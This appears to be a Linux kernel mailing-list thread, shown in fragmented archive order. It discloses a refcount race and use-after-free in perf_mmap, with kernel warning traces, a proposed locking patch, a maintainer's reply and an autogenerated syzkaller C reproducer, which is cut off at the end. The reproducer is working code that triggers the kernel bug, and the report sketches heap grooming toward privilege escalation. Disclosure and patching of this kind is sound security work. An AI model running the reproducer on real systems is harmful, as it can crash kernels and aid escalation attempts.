NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Mon, Feb 02, 2026 at 03:44:35PM +0800, Haocheng Yu wrote:
So you're saying this is something like:
Thread-1 Thread-2
mmap(fd)
close(fd) / ioctl(fd, IOC_SET_OUTPUT)
I don't think close() is possible, because mmap() should have a
reference on the struct file from fget(), no?
That leaves the ioctl(), let me go have a peek.
|
{
"author": "Peter Zijlstra <peterz@infradead.org>",
"date": "Mon, 2 Feb 2026 14:58:59 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
